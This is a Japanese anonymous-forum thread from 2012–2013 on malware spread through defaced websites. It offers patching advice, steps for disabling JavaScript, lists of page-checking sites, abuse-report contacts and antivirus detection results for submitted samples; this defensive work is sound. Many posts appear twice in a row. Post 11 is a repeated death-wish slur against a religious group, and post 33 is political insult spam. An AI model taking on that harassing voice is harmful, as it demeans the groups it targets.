【Gumblar/GENO】Web改竄ウイルス総合11【8080】
1 :名無しさん@お腹いっぱい。:
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
前スレ
【Gumblar/GENO】Web改竄ウイルス総合10【8080】
http://kohada.2ch.net/test/read.cgi/sec/1279692828/
感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
前スレ
【Gumblar/GENO】Web改竄ウイルス総合10【8080】
http://kohada.2ch.net/test/read.cgi/sec/1279692828/
|
|
|
2 :名無しさん@お腹いっぱい。:2012/08/14(火) 12:42:09.51
Gumblar(.x)、8080系ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
3 :名無しさん@お腹いっぱい。:2012/08/14(火) 12:42:25.57
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
4 :名無しさん@お腹いっぱい。:2012/08/14(火) 12:42:39.25
ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨)
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります
●InternetExplorer ツール→インターネットオプション→セキュリティ→
レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります
●InternetExplorer ツール→インターネットオプション→セキュリティ→
レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
5 :名無しさん@お腹いっぱい。:2012/08/14(火) 12:42:53.38
ブラウザ個別のプラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。
【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
6 :名無しさん@お腹いっぱい。:2012/08/14(火) 12:43:06.85
改竄を確認して通報する場合、サイト管理者への通報とともにJPCERT/CCに届出もお願いします。
■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/
サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック https://www.value-domain.com/webabuse.php
OCN http://www.ocn.ne.jp/info/rules/abuse/
さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml
ロリポップ https://lolipop.jp/support/inq/
GMOインターネットグループ https://secure.gmo.jp/contact/
インフォシーク (isweb) http://portal.faq.rakuten.co.jp/
DION http://www.auone-net.jp/security/knowledge/navi/index.html
NTTPCコミュニケーションズ http://www.nttpc.ne.jp/
ODN https://www.odn.ne.jp/support/question/input_netabuse.html
xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php
heteml ヘテムル https://secure.heteml.jp/support/inquiry/
ファーストサーバ http://www.firstserver.co.jp/contact/index.html
エキサイト http://www.excite.co.jp/help/support
■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/
サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック https://www.value-domain.com/webabuse.php
OCN http://www.ocn.ne.jp/info/rules/abuse/
さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml
ロリポップ https://lolipop.jp/support/inq/
GMOインターネットグループ https://secure.gmo.jp/contact/
インフォシーク (isweb) http://portal.faq.rakuten.co.jp/
DION http://www.auone-net.jp/security/knowledge/navi/index.html
NTTPCコミュニケーションズ http://www.nttpc.ne.jp/
ODN https://www.odn.ne.jp/support/question/input_netabuse.html
xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php
heteml ヘテムル https://secure.heteml.jp/support/inquiry/
ファーストサーバ http://www.firstserver.co.jp/contact/index.html
エキサイト http://www.excite.co.jp/help/support
7 :名無しさん@お腹いっぱい。:2012/08/14(火) 12:43:27.37
改竄を受けたら
ウイルス・不正アクセス届出状況について(3月分および第1四半期)
http://www.ipa.go.jp/security/txt/2010/04outline.html
(3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
・ 問い合わせ用窓口の連絡先
IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html
ウイルス・不正アクセス届出状況について(3月分および第1四半期)
http://www.ipa.go.jp/security/txt/2010/04outline.html
(3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
・ 問い合わせ用窓口の連絡先
IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html
8 :名無しさん@お腹いっぱい。:2012/08/14(火) 12:43:46.37
■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
9 :名無しさん@お腹いっぱい。:2012/08/14(火) 19:03:59.99
10 :名無しさん@お腹いっぱい。:2012/09/23(日) 20:55:28.32
.
11 :名無しさん@お腹いっぱい。:2012/10/10(水) 16:24:17.14
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
12 :名無しさん@お腹いっぱい。:2012/10/30(火) 18:56:14.77
天麩羅以外殆どレスがついてないな。平穏で何より。
13 :名無しさん@お腹いっぱい。:2012/11/15(木) 20:00:07.47
さらみ復帰かきこ
14 :名無しさん@お腹いっぱい。:2012/11/28(水) 22:48:45.00
「Adobe Reader」の「サンドボックス」を回避する脆弱性はなぜ危険か(トレンドマイクロ)
scan.netsecurity.ne.jp/article/2012/11/28/30520.html
>このエクスプロイトは、JavaScriptがソフトウェア上で無効になっている場合でも実行される。
>ユーザが必要とされる唯一のやりとりは、PDFファイルを開き、Webブラウザを閉じるだけで、
>それだけで脆弱性が悪用される。
scan.netsecurity.ne.jp/article/2012/11/28/30520.html
>このエクスプロイトは、JavaScriptがソフトウェア上で無効になっている場合でも実行される。
>ユーザが必要とされる唯一のやりとりは、PDFファイルを開き、Webブラウザを閉じるだけで、
>それだけで脆弱性が悪用される。
15 :/名無しさん[1-30] ◆.htmlint.U :2012/12/19(水) 20:42:32.31
「ITSOKNOPROBLEMBRO」
It's OK no problem bro.
「bro」って、なんじゃろ?
It's OK no problem bro.
「bro」って、なんじゃろ?
16 :名無しさん@お腹いっぱい。:2013/01/23(水) 18:38:57.70
JPドメイン Web改竄速報
tp://izumino.jp/Security/def_jp.html
tp://izumino.jp/Security/def_jp.html
17 :/名無しさん[1-30] ◆.htmlint.U :2013/01/24(木) 03:49:01.61
いろんなCMSがあるのね
ぱっと見、Joomla! 1.5が多いなん
「Joomla!」ってのはLTSが2.5で、まいなうpだてJoomla! 2.5.8になってるね
トップページにMETA HTTP-EQUIV="Refresh"〜仕込まれてるとこがあるる
こりは故意にやってるのかどーかわかんね
どーすべさ
ぱっと見、Joomla! 1.5が多いなん
「Joomla!」ってのはLTSが2.5で、まいなうpだてJoomla! 2.5.8になってるね
トップページにMETA HTTP-EQUIV="Refresh"〜仕込まれてるとこがあるる
こりは故意にやってるのかどーかわかんね
どーすべさ
18 :/名無しさん[1-30] ◆.htmlint.U :2013/01/27(日) 02:05:20.13
>< ;
> このメールにはご注意ください。送信者のアカウントが不正に使用されている可能性があるため、このメールは個人情報を騙し取ろうとする詐欺である可能性があります。
ぁぅぁぅぁー
検体8080を送ったら、ベンダーからの返信がみーんなこーなってた…
って、ことは改竄サイトのホスティングにはつーほーめる届いてないかもん
> このメールにはご注意ください。送信者のアカウントが不正に使用されている可能性があるため、このメールは個人情報を騙し取ろうとする詐欺である可能性があります。
ぁぅぁぅぁー
検体8080を送ったら、ベンダーからの返信がみーんなこーなってた…
って、ことは改竄サイトのホスティングにはつーほーめる届いてないかもん
19 :名無しさん@お腹いっぱい。:2013/01/28(月) 11:04:36.25
[Google セーフ ブラウジング診断ページ: microad.jp]
http://www.google.com/safebrowsing/diagnostic?site=microad.jp/
microad.jp は、過去 90 日間に 21 個のサイト(www34.atwiki.jp/no1mixisagi/, www16.atwiki.jp/godeaterburst-wiki/, soccer-douga.com/ など)への感染媒体となっていた形跡があります。
http://www.google.com/safebrowsing/diagnostic?site=microad.jp/
microad.jp は、過去 90 日間に 21 個のサイト(www34.atwiki.jp/no1mixisagi/, www16.atwiki.jp/godeaterburst-wiki/, soccer-douga.com/ など)への感染媒体となっていた形跡があります。
20 :/名無しさん[1-30] ◆.htmlint.U :2013/02/28(木) 17:25:53.64
RedKit Redirector Injected into Legitimate JavaScript Code | Xanda's Blog !~!
http://blog.xanda.org/2013/02/15/redkit-redirector-injected-into-legitimate-javascript-code/
マルウエア被害の実例と対策について || Joomla日本語コラム
http://www.joomla.jpn.com/joomla/column/joomlacolumn/1083-vol189.html
マカフィー株式会社 | McAfee Blog - 最新のエクスプロイトキット、Red Kit
http://www.mcafee.com/japan/security/mcafee_labs/blog/content.asp?id=1351
CMS以外のサイトもパパンがパンデミック
こうしてる合間にもまかひはEXTRA.DATを生産中
ひげおじさんもあびらもまいくろそふともがむばってます
http://blog.xanda.org/2013/02/15/redkit-redirector-injected-into-legitimate-javascript-code/
マルウエア被害の実例と対策について || Joomla日本語コラム
http://www.joomla.jpn.com/joomla/column/joomlacolumn/1083-vol189.html
マカフィー株式会社 | McAfee Blog - 最新のエクスプロイトキット、Red Kit
http://www.mcafee.com/japan/security/mcafee_labs/blog/content.asp?id=1351
CMS以外のサイトもパパンがパンデミック
こうしてる合間にもまかひはEXTRA.DATを生産中
ひげおじさんもあびらもまいくろそふともがむばってます
21 :名無しさん@お腹いっぱい。:2013/03/09(土) 23:22:58.95
RedKitリダイレクターけっこう多いよね (´ω`)
RedKit設置されてるサーバー
ぜんぶ正規のサイトだもんだからイヤラシイことこの上ない
RedKit設置されてるサーバー
ぜんぶ正規のサイトだもんだからイヤラシイことこの上ない
22 :/名無しさん[1-30] ◆.htmlint.U :2013/03/12(火) 19:21:28.73
ESET参戦
> Dear ○○,
>
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> *********_ahhd.htm_i.txt - JS/Exploit.Agent.NEN trojan
> *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan
> *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan
>
> Regards,
>
> ESET Malware Response Team
>>21
もうね、どーしよーもにゃー
検体送付とつーほーがワンセット サンセット イーセット
(-Д-) サムイネェ
> Dear ○○,
>
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> *********_ahhd.htm_i.txt - JS/Exploit.Agent.NEN trojan
> *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan
> *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan
>
> Regards,
>
> ESET Malware Response Team
>>21
もうね、どーしよーもにゃー
検体送付とつーほーがワンセット サンセット イーセット
(-Д-) サムイネェ
23 :/名無しさん[1-30] ◆.htmlint.U :2013/03/13(水) 18:34:27.64
>>20
> Hello,
>
> The files sent to us could be allocated to the following malware families:
>
> - EXP/Pidief.dtd
> - JS/Dldr.Agent.ahi
>
> The detections and repair routines of the malware samples will be available prospective with one of next update of the VDF.
>
> Best regards,
> Avira Sdn Bhd
うほ
> Hello,
>
> The files sent to us could be allocated to the following malware families:
>
> - EXP/Pidief.dtd
> - JS/Dldr.Agent.ahi
>
> The detections and repair routines of the malware samples will be available prospective with one of next update of the VDF.
>
> Best regards,
> Avira Sdn Bhd
うほ
24 :/名無しさん[1-30] ◆.htmlint.U :2013/03/15(金) 04:54:10.50
>>20のマカフィーが説明しているRedKitの中間Scriptが単純化したのを確認すた。。。しかも相対パスだぼ
現状、呼び出されるjar(exe)で検出されるのを待つしかにゃー
jar(exe)の進捗状況
Detection ratio: 6 / 45
Analysis date: 2013-03-14 12:13:28 UTC
↓
Detection ratio: 11 / 45
Analysis date: 2013-03-14 18:21:34 UTC
Analysis
Antivirus Result Update
DrWeb Trojan.DownLoader8.5817 20130314
Emsisoft Trojan.Win32.Agent.AMN (A) 20130314
Fortinet W32/Yakes.B!tr 20130314
Ikarus Trojan-Downloader.Win32.Karagany 20130314
Kaspersky UDS:DangerousObject.Multi.Generic 20130314
Malwarebytes Trojan.Agent.BVGen 20130314
McAfee PWS-FAQO!C7C63B63204E 20130314
Panda Suspicious file 20130314
TheHacker Posible_Worm32 20130314
TrendMicro PAK_Generic.001 20130314
TrendMicro-HouseCall TROJ_GEN.RC1H1CE 20130314
検出できないかもしれない中間Scriptとjar(exe)をメルで送れるベンダーに検体提出しました。
現状、呼び出されるjar(exe)で検出されるのを待つしかにゃー
jar(exe)の進捗状況
Detection ratio: 6 / 45
Analysis date: 2013-03-14 12:13:28 UTC
↓
Detection ratio: 11 / 45
Analysis date: 2013-03-14 18:21:34 UTC
Analysis
Antivirus Result Update
DrWeb Trojan.DownLoader8.5817 20130314
Emsisoft Trojan.Win32.Agent.AMN (A) 20130314
Fortinet W32/Yakes.B!tr 20130314
Ikarus Trojan-Downloader.Win32.Karagany 20130314
Kaspersky UDS:DangerousObject.Multi.Generic 20130314
Malwarebytes Trojan.Agent.BVGen 20130314
McAfee PWS-FAQO!C7C63B63204E 20130314
Panda Suspicious file 20130314
TheHacker Posible_Worm32 20130314
TrendMicro PAK_Generic.001 20130314
TrendMicro-HouseCall TROJ_GEN.RC1H1CE 20130314
検出できないかもしれない中間Scriptとjar(exe)をメルで送れるベンダーに検体提出しました。
25 :名無しさん@お腹いっぱい。:2013/03/18(月) 02:36:23.26
国内Webサーバの大規模改ざん発生中。アクセスすると別サイトから自動的にマルウェアダウンロード
http://engawa.2ch.net/test/read.cgi/poverty/1363534745/
http://engawa.2ch.net/test/read.cgi/poverty/1363534745/
26 :名無しさん@お腹いっぱい。:2013/03/18(月) 12:58:33.77
国内Webサーバの大規模改ざん発生age
27 :名無しさん@お腹いっぱい。:2013/03/18(月) 17:21:15.82
【社会】環境省サイトが改ざんされる…閲覧者がウイルス感染する危険も
uni.2ch.net/test/read.cgi/newsplus/1363506806/
環境省に聞いてみました
改ざんされてると分かったのはなぜ?
ゼロデイ・ジャパン(0day.jp) | セキュリティ&マルウェア研究所
0day.jp/
↑
ここで告知されていたからとのこと
uni.2ch.net/test/read.cgi/newsplus/1363506806/
環境省に聞いてみました
改ざんされてると分かったのはなぜ?
ゼロデイ・ジャパン(0day.jp) | セキュリティ&マルウェア研究所
0day.jp/
↑
ここで告知されていたからとのこと
28 :名無しさん@お腹いっぱい。:2013/03/18(月) 18:05:15.24
924 :名無しさん@お腹いっぱい。:2013/03/18(月) 16:11:10.81
環境省サイト改ざんウイルス
https://www.virustotal.com/ja/file/a22fdaff19722f4a4d92df3f0057761cf6834a36eb54862938b77ce6ee4539bc/analysis/1363349552/
https://www.virustotal.com/ja/file/a1bf517e91726f5e5dd57640b35e7bd4fc203ad843bbc7cdc472004a8d644933/analysis/1363559122/
環境省サイト改ざんウイルス
https://www.virustotal.com/ja/file/a22fdaff19722f4a4d92df3f0057761cf6834a36eb54862938b77ce6ee4539bc/analysis/1363349552/
https://www.virustotal.com/ja/file/a1bf517e91726f5e5dd57640b35e7bd4fc203ad843bbc7cdc472004a8d644933/analysis/1363559122/
29 :名無しさん@お腹いっぱい。:2013/03/18(月) 22:30:42.35
■NSX GT-ONE GT-ROM.NET
www●gt-rom●net/
>このサイトはコンピュータに損害を与える可能性があります。
www●gt-rom●net/
>このサイトはコンピュータに損害を与える可能性があります。
30 :名無しさん@お腹いっぱい。:2013/03/18(月) 23:38:43.30
>>24
EXEのダウンロードパスが固定数値からランダム数値に切り替わってるね
xxxx.htm
yyy.jar
??.html ← EXEが入手できん! (´ω`)
>>29
改竄されてて
最終的にCridexというマルウェアの感染となーる
EXEのダウンロードパスが固定数値からランダム数値に切り替わってるね
xxxx.htm
yyy.jar
??.html ← EXEが入手できん! (´ω`)
>>29
改竄されてて
最終的にCridexというマルウェアの感染となーる
31 :/名無しさん[1-30] ◆.htmlint.U :2013/03/19(火) 12:27:04.71
ぅほっ
一日見ない間になんかすごいことに
>>25-28
リストが多くて挫折したのさ。。。orz....
>>29
アッー
>>30
やっぱランダムだたのね
>24以後、DLできなくなたー
決め打ちもできんくなたー
一日見ない間になんかすごいことに
>>25-28
リストが多くて挫折したのさ。。。orz....
>>29
アッー
>>30
やっぱランダムだたのね
>24以後、DLできなくなたー
決め打ちもできんくなたー
32 :名無しさん@お腹いっぱい。:2013/03/19(火) 18:36:24.53
感染サイト一覧
unixfreaxjp.blogspot.jp/2013/03/ocjp-098-285blackhole-exploit-kit.html
つまり、周知キャンペーンw
unixfreaxjp.blogspot.jp/2013/03/ocjp-098-285blackhole-exploit-kit.html
つまり、周知キャンペーンw
33 :名無しさん@お腹いっぱい。:2013/03/19(火) 18:48:05.28
<愛国者とネトウヨの11の違い>
理路整然と意見を話すのが愛国者 出所不明な怪文書を貼るのがネトウヨ
有識で周りの評価が高いのが愛国者 無職でプライドだけ高いのがネトウヨ
日本人である事を誇りに思うのが愛国者 日本人である事だけが誇りなのがネトウヨ
討論で相手の愛国度をはかるのが愛国者 討論で相手を売国奴扱いするのがネトウヨ
君が代をきちんと歌えるのが愛国者 気味が悪いほどネットで吠えるのがネトウヨ
家族思いなのが愛国者 家族の重荷になっているのがネトウヨ
社会に出て一人前なのが愛国者 2ちゃんねるでだけ一人前なのがネトウヨ
日本の歴史と政治に学が深いのが愛国者 2ちゃんの書き込みとレスが不快なのがネトウヨ
日本人が逮捕されると残念だと嘆くのが愛国者 日本人が逮捕されると通名だとわめくのがネトウヨ
日本の事を敬虔(けいけん)に思っているのが愛国者 自分の事を聖戦士だと思っているのがネトウヨ
投票で清き一票を入れるのが愛国者 妄想でキモい文章を作るのがネトウヨ
理路整然と意見を話すのが愛国者 出所不明な怪文書を貼るのがネトウヨ
有識で周りの評価が高いのが愛国者 無職でプライドだけ高いのがネトウヨ
日本人である事を誇りに思うのが愛国者 日本人である事だけが誇りなのがネトウヨ
